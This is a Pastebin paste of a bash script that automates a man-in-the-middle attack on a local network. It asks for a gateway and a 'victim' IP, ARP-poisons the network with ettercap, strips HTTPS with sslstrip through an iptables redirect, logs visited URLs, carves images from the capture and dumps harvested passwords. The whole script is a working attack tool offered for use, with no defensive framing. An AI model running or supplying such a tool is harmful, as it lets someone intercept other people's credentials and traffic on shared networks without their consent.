Guest User

Untitled

a guest
Feb 21st, 2018
79
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.25 KB | None | 0 0
  1. #!/bin/bash
  2. echo -n "Do you want to execute Wireshark when done? If yes, LEAVE BLANK "
  3. read -e NOYES
  4. echo -n "Do you want to extract pictures from the pcap via tcpxtract? If yes, LEAVE BLANK "
  5. read -e XTRACT
  6. echo -n "What interface to use? ie wlan0: "
  7. read -e IFACE
  8. echo -n "Name of "Session"? (name of the folder that will be created with all the log files): "
  9. read -e SESSION
  10. echo -n "Gateway IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
  11. read -e ROUTER
  12. echo -n "Target IP - LEAVE BLANK IF YOU WANT TO ARP WHOLE NETWORK: "
  13. read -e VICTIM
  14. mkdir /root/$SESSION/
  15. iptables --flush
  16. iptables --table nat --flush
  17. iptables --delete-chain
  18. iptables --table nat --delete-chain
  19. sslstrip -p -k -w /root/$SESSION/$SESSION.log &
  20. iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
  21. urlsnarf -i $IFACE | grep http > /root/$SESSION/$SESSION.txt &
  22. ettercap -T -i $IFACE -w /root/$SESSION/$SESSION.pcap -L /root/$SESSION/$SESSION -M arp /$ROUTER/ /$VICTIM/
  23. "$XTRACT"tcpxtract -f /root/$SESSION/$SESSION.pcap
  24. "$NOYES"wireshark &
  25. killall sslstrip
  26. killall python
  27. killall urlsnarf
  28. iptables --flush
  29. iptables --table nat --flush
  30. iptables --delete-chain
  31. iptables --table nat --delete-chain
  32. etterlog -p -i /root/$SESSION/$SESSION.eci
Add Comment
Please, Sign In to add comment